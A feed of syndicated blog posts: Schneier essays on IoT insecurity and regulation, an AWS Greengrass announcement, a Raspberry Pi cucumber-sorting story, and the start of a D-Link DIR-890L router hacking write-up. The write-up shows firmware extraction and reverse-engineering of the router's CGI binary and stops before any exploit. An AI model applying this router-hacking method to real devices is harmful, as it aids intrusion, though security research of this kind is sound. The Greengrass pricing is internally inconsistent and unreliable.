Now, let’s start listing the security threats. We don’t want car navigation systems to be used for mass surveillance, or the microphone for mass eavesdropping. We might want it to be used to determine a car’s location in the event of a 911 call, and possibly to collect information about highway congestion. We don’t want people to hack their own cars to bypass emissions-control limitations. We don’t want manufacturers or dealers to be able to do that, either, as Volkswagen did for years. We can imagine wanting to give police the ability to remotely and safely disable a moving car; that would make high-speed chases a thing of the past. But we definitely don’t want hackers to be able to do that. We definitely don’t want them disabling the brakes in every car without warning, at speed. As we make the transition from driver-controlled cars to cars with various driver-assist capabilities to fully driverless cars, we don’t want any of those critical components subverted. We don’t want someone to be able to accidentally crash your car, let alone do it on purpose. And equally, we don’t want them to be able to manipulate the navigation software to change your route, or the door-lock controls to prevent you from opening the door. I could go on.

That’s a lot of different security requirements, and the effects of getting them wrong range from illegal surveillance to extortion by ransomware to mass death.

**********

Our computers and smartphones are as secure as they are because companies like Microsoft, Apple, and Google spend a lot of time testing their code before it's released, and quickly patch vulnerabilities when they're discovered. Those companies can support large, dedicated teams because they make a huge amount of money, either directly or indirectly, from their software and, in part, compete on its security. Unfortunately, this isn't true of embedded systems like digital video recorders or home routers. Those systems are sold at a much lower margin, and are often built by offshore third parties. The companies involved simply don't have the expertise to make them secure.

At a recent hacker conference, a security researcher analyzed 30 home routers and was able to break into half of them, including some of the most popular and common brands. The denial-of-service attacks that forced popular websites like Reddit and Twitter off the internet last October were enabled by vulnerabilities in devices like webcams and digital video recorders. In August, two security researchers demonstrated a ransomware attack on a smart thermostat.

Even worse, most of these devices don’t have any way to be patched. Companies like Microsoft and Apple continuously deliver security patches to your computers. Some home routers are technically patchable, but in a complicated way that only an expert would attempt. And the only way for you to update the firmware in your hackable DVR is to throw it away and buy a new one.

The market can’t fix this because neither the buyer nor the seller cares. The owners of the webcams and DVRs used in the denial-of-service attacks don’t care. Their devices were cheap to buy, they still work, and they don’t know any of the victims of the attacks. The sellers of those devices don’t care: They’re now selling newer and better models, and the original buyers only cared about price and features. There is no market solution, because the insecurity is what economists call an externality: It’s an effect of the purchasing decision that affects other people. Think of it kind of like invisible pollution.

**********

Security is an arms race between attacker and defender. Technology perturbs that arms race by changing the balance between attacker and defender. Understanding how this arms race has unfolded on the internet is essential to understanding why the world-size robot we’re building is so insecure, and how we might secure it. To that end, I have five truisms, born from what we’ve already learned about computer and internet security. They will soon affect the security arms race everywhere.

Truism No. 1: On the internet, attack is easier than defense.

There are many reasons for this, but the most important is the complexity of these systems. More complexity means more people involved, more parts, more interactions, more mistakes in the design and development process, more of everything where hidden insecurities can be found. Computer-security experts like to speak about the attack surface of a system: all the possible points an attacker might target and that must be secured. A complex system means a large attack surface. The defender has to secure the entire attack surface. The attacker just has to find one vulnerability -- one unsecured avenue for attack -- and gets to choose how and when to attack. It's simply not a fair battle.

There are other, more general, reasons why attack is easier than defense. Attackers have a natural agility that defenders often lack. They don’t have to worry about laws, and often not about morals or ethics. They don’t have a bureaucracy to contend with, and can more quickly make use of technical innovations. Attackers also have a first-mover advantage. As a society, we’re generally terrible at proactive security; we rarely take preventive security measures until an attack actually happens. So more advantages go to the attacker.

Truism No. 2: Most software is poorly written and insecure.

If complexity isn’t enough, we compound the problem by producing lousy software. Well-written software, like the kind found in airplane avionics, is both expensive and time-consuming to produce. We don’t want that. For the most part, poorly written software has been good enough. We’d all rather live with buggy software than pay the prices good software would require. We don’t mind if our games crash regularly, or our business applications act weird once in a while. Because software has been largely benign, it hasn’t mattered. This has permeated the industry at all levels. At universities, we don’t teach how to code well. Companies don’t reward quality code in the same way they reward fast and cheap. And we consumers don’t demand it.

But poorly written software is riddled with bugs, sometimes as many as one per 1,000 lines of code. Some of them are inherent in the complexity of the software, but most are programming mistakes. Not all bugs are vulnerabilities, but some are.

Truism No. 3: Connecting everything to each other via the internet will expose new vulnerabilities.

The more we network things together, the more vulnerabilities on one thing will affect other things. On October 21, vulnerabilities in a wide variety of embedded devices were all harnessed together to create what hackers call a botnet. This botnet was used to launch a distributed denial-of-service attack against a company called Dyn. Dyn provided a critical internet function for many major internet sites. So when Dyn went down, so did all those popular websites.

These chains of vulnerabilities are everywhere. In 2012, journalist Mat Honan suffered a massive personal hack because of one of them. A vulnerability in his Amazon account allowed hackers to get into his Apple account, which allowed them to get into his Gmail account. And in 2013, the Target Corporation was hacked by someone stealing credentials from its HVAC contractor.

Vulnerabilities like these are particularly hard to fix, because no one system might actually be at fault. It might be the insecure interaction of two individually secure systems.

Truism No. 4: Everybody has to stop the best attackers in the world.

One of the most powerful properties of the internet is that it allows things to scale. This is true for our ability to access data or control systems or do any of the cool things we use the internet for, but it's also true for attacks. In general, fewer attackers can do more damage because of better technology. It's not just that modern attackers are more efficient; it's that the internet allows attacks to scale to a degree impossible without computers and networks.

This is fundamentally different from what we’re used to. When securing my home against burglars, I am only worried about the burglars who live close enough to my home to consider robbing me. The internet is different. When I think about the security of my network, I have to be concerned about the best attacker possible, because he’s the one who’s going to create the attack tool that everyone else will use. The attacker that discovered the vulnerability used to attack Dyn released the code to the world, and within a week there were a dozen attack tools using it.

Truism No. 5: Laws inhibit security research.

The Digital Millennium Copyright Act is a terrible law that fails at its purpose of preventing widespread piracy of movies and music. To make matters worse, it contains a provision that has critical side effects. According to the law, it is a crime to bypass security mechanisms that protect copyrighted work, even if that bypassing would otherwise be legal. Since all software can be copyrighted, it is arguably illegal to do security research on these devices and to publish the results.

Although the exact contours of the law are arguable, many companies are using this provision of the DMCA to threaten researchers who expose vulnerabilities in their embedded systems. This instills fear in researchers, and has a chilling effect on research, which means two things: (1) Vendors of these devices are more likely to leave them insecure, because no one will notice and they won’t be penalized in the market, and (2) security engineers don’t learn how to do security better.

Unfortunately, companies generally like the DMCA. The provisions against reverse-engineering spare them the embarrassment of having their shoddy security exposed. It also allows them to build proprietary systems that lock out competition. (This is an important one. Right now, your toaster cannot force you to only buy a particular brand of bread. But because of this law and an embedded computer, your Keurig coffee maker can force you to buy a particular brand of coffee.)

**********

In general, there are two basic paradigms of security. We can either try to secure something well the first time, or we can make our security agile. The first paradigm comes from the world of dangerous things: from planes, medical devices, buildings. It's the paradigm that gives us secure design and secure engineering, security testing and certifications, professional licensing, detailed preplanning and complex government approvals, and long times-to-market. It's security for a world where getting it right is paramount because getting it wrong means people dying.

The second paradigm comes from the fast-moving and heretofore largely benign world of software. In this paradigm, we have rapid prototyping, on-the-fly updates, and continual improvement. In this paradigm, new vulnerabilities are discovered all the time and security disasters regularly happen. Here, we stress survivability, recoverability, mitigation, adaptability, and muddling through. This is security for a world where getting it wrong is okay, as long as you can respond fast enough.

These two worlds are colliding. They’re colliding in our cars -­ literally -­ in our medical devices, our building control systems, our traffic control systems, and our voting machines. And although these paradigms are wildly different and largely incompatible, we need to figure out how to make them work together.

So far, we haven’t done very well. We still largely rely on the first paradigm for the dangerous computers in cars, airplanes, and medical devices. As a result, there are medical systems that can’t have security patches installed because that would invalidate their government approval. In 2015, Chrysler recalled 1.4 million cars to fix a software vulnerability. In September 2016, Tesla remotely sent a security patch to all of its Model S cars overnight. Tesla sure sounds like it’s doing things right, but what vulnerabilities does this remote patch feature open up?

**********

Until now we’ve largely left computer security to the market. Because the computer and network products we buy and use are so lousy, an enormous after-market industry in computer security has emerged. Governments, companies, and people buy the security they think they need to secure themselves. We’ve muddled through well enough, but the market failures inherent in trying to secure this world-size robot will soon become too big to ignore.

Markets alone can’t solve our security problems. Markets are motivated by profit and short-term goals at the expense of society. They can’t solve collective-action problems. They won’t be able to deal with economic externalities, like the vulnerabilities in DVRs that resulted in Twitter going offline. And we need a counterbalancing force to corporate power.

This all points to policy. While the details of any computer-security system are technical, getting the technologies broadly deployed is a problem that spans law, economics, psychology, and sociology. And getting the policy right is just as important as getting the technology right because, for internet security to work, law and technology have to work together. This is probably the most important lesson of Edward Snowden’s NSA disclosures. We already knew that technology can subvert law. Snowden demonstrated that law can also subvert technology. Both fail unless each works. It’s not enough to just let technology do its thing.

Any policy changes to secure this world-size robot will mean significant government regulation. I know it’s a sullied concept in today’s world, but I don’t see any other possible solution. It’s going to be especially difficult on the internet, where its permissionless nature is one of the best things about it and the underpinning of its most world-changing innovations. But I don’t see how that can continue when the internet can affect the world in a direct and physical manner.

**********

I have a proposal: a new government regulatory agency. Before dismissing it out of hand, please hear me out.

We have a practical problem when it comes to internet regulation. There’s no government structure to tackle this at a systemic level. Instead, there’s a fundamental mismatch between the way government works and the way this technology works that makes dealing with this problem impossible at the moment.

Government operates in silos. In the U.S., the FAA regulates aircraft. The NHTSA regulates cars. The FDA regulates medical devices. The FCC regulates communications devices. The FTC protects consumers in the face of “unfair” or “deceptive” trade practices. Even worse, who regulates data can depend on how it is used. If data is used to influence a voter, it’s the Federal Election Commission’s jurisdiction. If that same data is used to influence a consumer, it’s the FTC’s. Use those same technologies in a school, and the Department of Education is now in charge. Robotics will have its own set of problems, and no one is sure how that is going to be regulated. Each agency has a different approach and different rules. They have no expertise in these new issues, and they are not quick to expand their authority for all sorts of reasons.

Compare that with the internet. The internet is a freewheeling system of integrated objects and networks. It grows horizontally, demolishing old technological barriers so that people and systems that never previously communicated now can. Already, apps on a smartphone can log health information, control your energy use, and communicate with your car. That’s a set of functions that crosses jurisdictions of at least four different government agencies, and it’s only going to get worse.

Our world-size robot needs to be viewed as a single entity with millions of components interacting with each other. Any solutions here need to be holistic. They need to work everywhere, for everything. Whether we’re talking about cars, drones, or phones, they’re all computers.

This has lots of precedent. Many new technologies have led to the formation of new government regulatory agencies. Trains did, cars did, airplanes did. Radio led to the formation of the Federal Radio Commission, which became the FCC. Nuclear power led to the formation of the Atomic Energy Commission, which eventually became the Department of Energy. The reasons were the same in every case. New technologies need new expertise because they bring with them new challenges. Governments need a single agency to house that new expertise, because its applications cut across several preexisting agencies. It's less that the new agency needs to regulate -- although that's often a big part of it -- and more that governments recognize the importance of the new technologies.

The internet has famously eschewed formal regulation, instead adopting a multi-stakeholder model of academics, businesses, governments, and other interested parties. My hope is that we can keep the best of this approach in any regulatory agency, perhaps looking to the new U.S. Digital Service or the 18F office inside the General Services Administration. Both organizations are dedicated to providing digital government services, both have collected significant expertise by bringing in people from outside of government, and both have learned how to work closely with existing agencies. Any internet regulatory agency will similarly need to engage in a high level of collaborative regulation -- both a challenge and an opportunity.

I don’t think any of us can predict the totality of the regulations we need to ensure the safety of this world, but here are a few. We need government to ensure companies follow good security practices: testing, patching, secure defaults -- and we need to be able to hold companies liable when they fail to do these things. We need government to mandate strong personal data protections, and limitations on data collection and use. We need to ensure that responsible security research is legal and well-funded. We need to enforce transparency in design, some sort of code escrow in case a company goes out of business, and interoperability between devices of different manufacturers, to counterbalance the monopolistic effects of interconnected technologies. Individuals need the right to take their data with them. And internet-enabled devices should retain some minimal functionality if disconnected from the internet.

I’m not the only one talking about this. I’ve seen proposals for a National Institutes of Health analog for cybersecurity. University of Washington law professor Ryan Calo has proposed a Federal Robotics Commission. I think it needs to be broader: maybe a Department of Technology Policy.

Of course there will be problems. There’s a lack of expertise in these issues inside government. There’s a lack of willingness in government to do the hard regulatory work. Industry is worried about any new bureaucracy: both that it will stifle innovation by regulating too much and that it will be captured by industry and regulate too little. A domestic regulatory agency will have to deal with the fundamentally international nature of the problem.

But government is the entity we use to solve problems like this. Governments have the scope, scale, and balance of interests to address the problems. It's the institution we've built to adjudicate competing social interests and internalize market externalities. Left to its own devices, the market simply can't. That we're currently in the middle of an era of low government trust, where many of us can't imagine government doing anything positive in an area like this, is to our detriment.

Here’s the thing: Governments will get involved, regardless. The risks are too great, and the stakes are too high. Government already regulates dangerous physical systems like cars and medical devices. And nothing motivates the U.S. government like fear. Remember 2001? A nominally small-government Republican president created the Office of Homeland Security 11 days after the terrorist attacks: a rushed and ill-thought-out decision that we’ve been trying to fix for over a decade. A fatal disaster will similarly spur our government into action, and it’s unlikely to be well-considered and thoughtful action. Our choice isn’t between government involvement and no government involvement. Our choice is between smarter government involvement and stupider government involvement. We have to start thinking about this now. Regulations are necessary, important, and complex; and they’re coming. We can’t afford to ignore these issues until it’s too late.

We also need to start disconnecting systems. If we cannot secure complex systems to the level required by their real-world capabilities, then we must not build a world where everything is computerized and interconnected.

There are other models. We can enable local communications only. We can set limits on collected and stored data. We can deliberately design systems that don’t interoperate with each other. We can deliberately fetter devices, reversing the current trend of turning everything into a general-purpose computer. And, most important, we can move toward less centralization and more distributed systems, which is how the internet was first envisioned.

This might be a heresy in today’s race to network everything, but large, centralized systems are not inevitable. The technical elites are pushing us in that direction, but they really don’t have any good supporting arguments other than the profits of their ever-growing multinational corporations.

But this will change. It will change not only because of security concerns, it will also change because of political concerns. We’re starting to chafe under the worldview of everything producing data about us and what we do, and that data being available to both governments and corporations. Surveillance capitalism won’t be the business model of the internet forever. We need to change the fabric of the internet so that evil governments don’t have the tools to create a horrific totalitarian state. And while good laws and regulations in Western democracies are a great second line of defense, they can’t be our only line of defense.

My guess is that we will soon reach a high-water mark of computerization and connectivity, and that afterward we will make conscious decisions about what and how we decide to interconnect. But we’re still in the honeymoon phase of connectivity. Governments and corporations are punch-drunk on our data, and the rush to connect everything is driven by an even greater desire for power and market share. One of the presentations released by Edward Snowden contained the NSA mantra: “Collect it all.” A similar mantra for the internet today might be: “Connect it all.”

The inevitable backlash will not be driven by the market. It will be deliberate policy decisions that put the safety and welfare of society above individual corporations and industries. It will be deliberate policy decisions that prioritize the security of our systems over the demands of the FBI to weaken them in order to make their law-enforcement jobs easier. It’ll be hard policy for many to swallow, but our safety will depend on it.

**********

The scenarios I’ve outlined, both the technological and economic trends that are causing them and the political changes we need to make to start to fix them, come from my years of working in internet-security technology and policy. All of this is informed by an understanding of both technology and policy. That turns out to be critical, and there aren’t enough people who understand both.

This brings me to my final plea: We need more public-interest technologists.

Over the past couple of decades, we’ve seen examples of getting internet-security policy badly wrong. I’m thinking of the FBI’s “going dark” debate about its insistence that computer devices be designed to facilitate government access, the “vulnerability equities process” about when the government should disclose and fix a vulnerability versus when it should use it to attack other systems, the debacle over paperless touch-screen voting machines, and the DMCA that I discussed above. If you watched any of these policy debates unfold, you saw policy-makers and technologists talking past each other.

Our world-size robot will exacerbate these problems. The historical divide between Washington and Silicon Valley — the mistrust of governments by tech companies and the mistrust of tech companies by governments — is dangerous.

We have to fix this. Getting IoT security right depends on the two sides working together and, even more important, having people who are experts in each working on both. We need technologists to get involved in policy, and we need policy-makers to get involved in technology. We need people who are experts in making both technology and technological policy. We need technologists on congressional staffs, inside federal agencies, working for NGOs, and as part of the press. We need to create a viable career path for public-interest technologists, much as there already is one for public-interest attorneys. We need courses, and degree programs in colleges, for people interested in careers in public-interest technology. We need fellowships in organizations that need these people. We need technology companies to offer sabbaticals for technologists wanting to go down this path. We need an entire ecosystem that supports people bridging the gap between technology and law. We need a viable career path that ensures that even though people in this field won't make as much as they would in a high-tech start-up, they will have viable careers. The security of our computerized and networked future — meaning the security of ourselves, families, homes, businesses, and communities — depends on it.

This plea is bigger than security, actually. Pretty much all of the major policy debates of this century will have a major technological component. Whether it’s weapons of mass destruction, robots drastically affecting employment, climate change, food safety, or the increasing ubiquity of ever-shrinking drones, understanding the policy means understanding the technology. Our society desperately needs technologists working on the policy. The alternative is bad policy.

**********

The world-size robot is less designed than created. It’s coming without any forethought or architecting or planning; most of us are completely unaware of what we’re building. In fact, I am not convinced we can actually design any of this. When we try to design complex sociotechnical systems like this, we are regularly surprised by their emergent properties. The best we can do is observe and channel these properties as best we can.

Market thinking sometimes makes us lose sight of the human choices and autonomy at stake. Before we get controlled — or killed — by the world-size robot, we need to rebuild confidence in our collective governance institutions. Law and policy may not seem as cool as digital tech, but they're also places of critical innovation. They're where we collectively bring about the world we want to live in.

While I might sound like a Cassandra, I’m actually optimistic about our future. Our society has tackled bigger problems than this one. It takes work and it’s not easy, but we eventually find our way clear to make the hard choices necessary to solve our real problems.

The world-size robot we’re building can only be managed responsibly if we start making real choices about the interconnected world we live in. Yes, we need security systems as robust as the threat landscape. But we also need laws that effectively regulate these dangerous technologies. And, more generally, we need to make moral, ethical, and political decisions on how those systems should work. Until now, we’ve largely left the internet alone. We gave programmers a special right to code cyberspace as they saw fit. This was okay because cyberspace was separate and relatively unimportant: That is, it didn’t matter. Now that that’s changed, we can no longer give programmers and the companies they work for this power. Those moral, ethical, and political decisions need, somehow, to be made by everybody. We need to link people with the same zeal that we are currently linking machines. “Connect it all” must be countered with “connect us all.”

This essay previously appeared in New York Magazine.

AWS Greengrass – Ubiquitous, Real-World Computing

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/aws-greengrass-ubiquitous-real-world-computing/

Computing and data processing within the confines of a data center or office is easy. You can generally count on good connectivity and a steady supply of electricity, and you have access to as much on-premises or cloud-based storage and compute power as you need. The situation is much different out in the real world. Connectivity can be intermittent, unreliable, and limited in speed and scale. Power is at a premium, putting limits on how much storage and compute power can be brought in to play.

Lots of interesting and potentially valuable data is present out in the field, if only it could be collected, processed, and turned into actionable intelligence. This data could be located miles below the surface of the Earth in a mine or an oil well, in a sensitive & safety-critical location like a hospital or a factory, or even on another planet (hello, Curiosity).

Our customers are asking for a way to use the scale and power of the AWS Cloud to help them do local processing under these trying conditions. First, they want to build systems that measure, sense, and act upon the data locally. Then they want to bring cloud-like, local intelligence to bear on the data, implementing local actions that are interdependent and coordinated. To make this even more challenging, they want to make use of any available local processing and storage resources, while also connecting to specialized sensors and peripherals.

Introducing AWS Greengrass
I’d like to tell you about AWS Greengrass. This new service is designed to allow you to address the challenges that I outlined above by extending the AWS programming model to small, simple, field-based devices.

Greengrass builds on AWS IoT and AWS Lambda, and can also access other AWS services. It is built for offline operation and greatly simplifies the implementation of local processing. Code running in the field can collect, filter, and aggregate freshly collected data and then push it up to the cloud for long-term storage and further aggregation. Further, code running in the field can also take action very quickly, even in cases where connectivity to the cloud is temporarily unavailable.

If you are already developing embedded systems for small devices, you will now be able to make use of modern, cloud-aware development tools and workflows. You can write and test your code in the cloud and then deploy it locally. You can write Python code that responds to device events and you can make use of MQTT-based pub/sub messaging for communication.
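As a rough sketch of that workflow (this is not the actual Greengrass API; the handler signature mirrors AWS Lambda's Python convention, and the event fields and the threshold are invented for illustration), a locally deployed function might filter sensor data before anything is pushed to the cloud:

```python
import json

# A hypothetical Greengrass-style Lambda handler: filter readings locally
# and flag only high readings for forwarding to the cloud. The event shape
# ("temperature") and the threshold of 40 are illustrative assumptions.
def function_handler(event, context):
    reading = event.get("temperature")
    if reading is not None and reading > 40:
        return {"forward": True, "payload": json.dumps(event)}
    return {"forward": False}
```

In a deployed system, the Core would invoke such a handler in response to local MQTT messages and forward only the flagged payloads upstream.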

Greengrass has two constituent parts, the Greengrass Core (GGC) and the IoT Device SDK. Both of these components run on your own hardware, out in the field.

Greengrass Core is designed to run on devices that have at least 128 MB of memory and an x86 or ARM CPU running at 1 GHz or better, and can take advantage of additional resources if available. It runs Lambda functions locally, interacts with the AWS Cloud, manages security & authentication, and communicates with the other devices under its purview.

The IoT Device SDK is used to build the applications that run on the devices that connect to the device that hosts the core (generally via a LAN or other local connection). These applications will capture data from sensors, subscribe to MQTT topics, and use AWS IoT device shadows to store and retrieve state information.

Using AWS Greengrass
You will be able to set up and manage many aspects of Greengrass through the AWS Management Console, the AWS APIs, and the AWS Command Line Interface (CLI).

You will be able to register new hub devices, configure the desired set of Lambda functions, and create a deployment package for delivery to the device. From there, you will associate the lightweight devices with the hub.

Now in Preview
We are launching a limited preview of AWS Greengrass today and you can sign up now if you would like to participate.

Each AWS customer will be able to use up to 3 devices for one year at no charge. Beyond that, the monthly cost for each active Greengrass Core is $0.16 ($1.49 per year) for up to 10,000 devices.

Jeff;

 

Research into IoT Security Is Finally Legal

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2016/11/research_into_i.html

For years, the DMCA has been used to stifle legitimate research into the security of embedded systems. Finally, the research exemption to the DMCA is in effect (for two years, but we can hope it’ll be extended forever).

Security Economics of the Internet of Things

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2016/10/security_econom_1.html

Brian Krebs is a popular reporter on the cybersecurity beat. He regularly exposes cybercriminals and their tactics, and consequently is regularly a target of their ire. Last month, he wrote about an online attack-for-hire service that resulted in the arrest of the two proprietors. In the aftermath, his site was taken down by a massive DDoS attack.

In many ways, this is nothing new. Distributed denial-of-service attacks are a family of attacks that cause websites and other Internet-connected systems to crash by overloading them with traffic. The "distributed" part means that other insecure computers on the Internet — sometimes in the millions — are recruited to a botnet to unwittingly participate in the attack. The tactics are decades old; DDoS attacks are perpetrated by lone hackers trying to be annoying, criminals trying to extort money, and governments testing their tactics. There are defenses, and there are companies that offer DDoS mitigation services for hire.

Basically, it’s a size vs. size game. If the attackers can cobble together a fire hose of data bigger than the defender’s capability to cope with, they win. If the defenders can increase their capability in the face of attack, they win.

What was new about the Krebs attack was both the massive scale and the particular devices the attackers recruited. Instead of using traditional computers for their botnet, they used CCTV cameras, digital video recorders, home routers, and other embedded computers attached to the Internet as part of the Internet of Things.

Much has been written about how the IoT is wildly insecure. In fact, the software used to attack Krebs was simple and amateurish. What this attack demonstrates is that the economics of the IoT mean that it will remain insecure unless government steps in to fix the problem. This is a market failure that can’t get fixed on its own.

Our computers and smartphones are as secure as they are because there are teams of security engineers working on the problem. Companies like Microsoft, Apple, and Google spend a lot of time testing their code before it's released, and quickly patch vulnerabilities when they're discovered. Those companies can support such teams because those companies make a huge amount of money, either directly or indirectly, from their software — and, in part, compete on its security. This isn't true of embedded systems like digital video recorders or home routers. Those systems are sold at a much lower margin, and are often built by offshore third parties. The companies involved simply don't have the expertise to make them secure.

Even worse, most of these devices don’t have any way to be patched. Even though the source code to the botnet that attacked Krebs has been made public, we can’t update the affected devices. Microsoft delivers security patches to your computer once a month. Apple does it just as regularly, but not on a fixed schedule. But the only way for you to update the firmware in your home router is to throw it away and buy a new one.

The security of our computers and phones also comes from the fact that we replace them regularly. We buy new laptops every few years. We get new phones even more frequently. This isn’t true for all of the embedded IoT systems. They last for years, even decades. We might buy a new DVR every five or ten years. We replace our refrigerator every 25 years. We replace our thermostat approximately never. Already the banking industry is dealing with the security problems of Windows 95 embedded in ATMs. This same problem is going to occur all over the Internet of Things.

The market can’t fix this because neither the buyer nor the seller cares. Think of all the CCTV cameras and DVRs used in the attack against Brian Krebs. The owners of those devices don’t care. Their devices were cheap to buy, they still work, and they don’t even know Brian. The sellers of those devices don’t care: they’re now selling newer and better models, and the original buyers only cared about price and features. There is no market solution because the insecurity is what economists call an externality: it’s an effect of the purchasing decision that affects other people. Think of it kind of like invisible pollution.

What this all means is that the IoT will remain insecure unless government steps in and fixes the problem. When we have market failures, government is the only solution. The government could impose security regulations on IoT manufacturers, forcing them to make their devices secure even though their customers don’t care. They could impose liabilities on manufacturers, allowing people like Brian Krebs to sue them. Any of these would raise the cost of insecurity and give companies incentives to spend money making their devices secure.

Of course, this would only be a domestic solution to an international problem. The Internet is global, and attackers can just as easily build a botnet out of IoT devices from Asia as from the United States. Long term, we need to build an Internet that is resilient against attacks like this. But that’s a long time coming. In the meantime, you can expect more attacks that leverage insecure IoT devices.

This essay previously appeared on Vice Motherboard.

Slashdot thread.

Here are some of the things that are vulnerable.

EDITED TO ADD (10/17): DARPA is looking for IoT-security ideas from the private sector.

Now with added cucumbers

Post Syndicated from Liz Upton original https://www.raspberrypi.org/blog/now-added-cucumbers/

Working here at Pi Towers, I’m always a little frustrated by not being able to share the huge number of commercial businesses’ embedded projects that use Raspberry Pis. (About a third of the Pis we sell go to businesses.) We don’t get to feature many of them on the blog; many organisations don’t want their work replicated by competitors, or aren’t prepared for customers and competitors to see how inexpensively they’re able to automate tasks. Every now and then, though, a company is happy to share what they’re using Pis for.


Makoto Koike, centre, with his parents on the family cucumber farm

Here’s a great example: a cucumber farm in Japan, which is using a Raspberry Pi to sort thorny cucumbers, saving the farmer eight to nine hours’ manual work a day.

Makoto Koike, the son of farmers, works as an embedded systems designer for the Japanese car industry. He started helping out at his parents' cucumber farm (which he will take over when they retire), and spotted a process that was ripe for automation.


Cucumbers from the Makotos’ farm

At the Makotos’ farm, cucumbers are graded into nine categories: the straightest, thickest, freshest, most vivid cucumbers (which must have plenty of characteristic spurs) are the best, and can be sold at the highest price. Makoto-san’s mother was in charge of sorting the cucumbers every day, which took eight hours at the peak of the harvest. Makoto-san had an epiphany after reading about Google’s AlphaGo beating the world number one professional Go player. He realised that machine learning and deep learning meant the sorting process could be automated, so he built a process using Google’s open-source machine learning library, TensorFlow, and some machinery to process the cucumbers into graded batches.


Sorting in action


Camera interface

Google have put together a diagram showing how the system works:

cucumber-farmer-14

There are difficulties in building this sort of system, not least the 7000 cucumbers, pre-graded by his mother, that Makoto-san had to photograph and label over a period of three months to give the model material to train with. He says:

“When I did a validation with the test images, the recognition accuracy exceeded 95%. But if you apply the system with real use cases, the accuracy drops down to about 70%. I suspect the neural network model has the issue of “overfitting” (the phenomenon in neural networks where the model is trained to fit only the small training dataset) because of the insufficient number of training images.”
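The gap Makoto-san describes is classic overfitting, and it is easy to reproduce with a toy example: a model that memorises a small, noisy training set scores perfectly on that set and near chance on fresh data. A minimal stdlib-only sketch (random numbers stand in for cucumber images; nothing here is from the actual system):

```python
import random

random.seed(0)

def nearest_label(x, train):
    # 1-nearest-neighbour "model": it simply memorises the training set.
    return min(train, key=lambda t: abs(t[0] - x))[1]

# Labels are pure noise, so there is nothing generalisable to learn.
train = [(random.random(), random.randint(0, 1)) for _ in range(20)]
test = [(random.random(), random.randint(0, 1)) for _ in range(1000)]

train_acc = sum(nearest_label(x, train) == y for x, y in train) / float(len(train))
test_acc = sum(nearest_label(x, train) == y for x, y in test) / float(len(test))
# train_acc is 1.0 by construction; test_acc hovers around 0.5.
```

More (and more varied) training images shrink this gap, which is exactly why the 7000 hand-labelled photos mattered.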

Still, it’s an impressive feat, and a real-world >95% accuracy rate is not unfeasible with a big enough data set. We’d be interested to see how the setup progresses, especially as more automation is added; right now, cucumbers are added to the processing hopper by hand, and a human has to interact with the touchscreen grading panel. Here’s the system at work:

TensorFlow powered cucumber sorter by Makoto Koike

Uploaded by Kazunori Sato on 2016-08-05.

We’re hoping to see some updates from the Makoto family as the system evolves. And in the meantime, if you have an embedded project you’d like to share with us, let us know in the comments!

 

The post Now with added cucumbers appeared first on Raspberry Pi.

Hacking the D-Link DIR-890L

Post Syndicated from Craig original http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/

The past 6 months have been incredibly busy, and I haven’t been keeping up with D-Link’s latest shenanigans. In need of some entertainment, I went to their web page today and was greeted by this atrocity:
D-Link’s $300 DIR-890L router
I think the most “insane” thing about this router is that it’s running the same buggy firmware that D-Link has been cramming in their routers for years…and the hits just keep on coming.

OK, let’s do the usual: grab the latest firmware release, binwalk it and see what we’ve got:

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 DLOB firmware header, boot partition: "dev=/dev/mtdblock/7"
116 0x74 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 4905376 bytes
1835124 0x1C0074 PackImg section delimiter tag, little endian size: 6345472 bytes; big endian size: 13852672 bytes
1835156 0x1C0094 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 13852268 bytes, 2566 inodes, blocksize: 131072 bytes, created: 2015-02-11 09:18:37

Looks like a pretty standard Linux firmware image, and if you’ve looked at any D-Link firmware over the past few years, you’ll probably recognize the root directory structure:

$ ls squashfs-root
bin dev etc home htdocs include lib mnt mydlink proc sbin sys tmp usr var www

All of the HTTP/UPnP/HNAP stuff is located under the htdocs directory. The most interesting file here is htdocs/cgibin, an ARM ELF binary which is executed by the web server for, well, just about everything: all CGI, UPnP, and HNAP related URLs are symlinked to this one binary:

$ ls -l htdocs/web/*.cgi
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/captcha.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/conntrack.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/dlapn.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/dlcfg.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/dldongle.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/fwup.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/fwupload.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/hedwig.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/pigwidgeon.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/seama.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/service.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/webfa_authentication.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/webfa_authentication_logout.cgi -> /htdocs/cgibin

It’s been stripped of course, but there are plenty of strings to help us out. The first thing that main does is compare argv[0] against all known symlink names (captcha.cgi, conntrack.cgi, etc) to decide which action it is supposed to take:
“Staircase” code graph, typical of if-else statements
Each of these comparisons are strcmp‘s against the expected symlink names:
Function handlers for various symlinks
This makes it easy to correlate each function handler to its respective symlink name and re-name the functions appropriately:
Renamed symlink function handlers
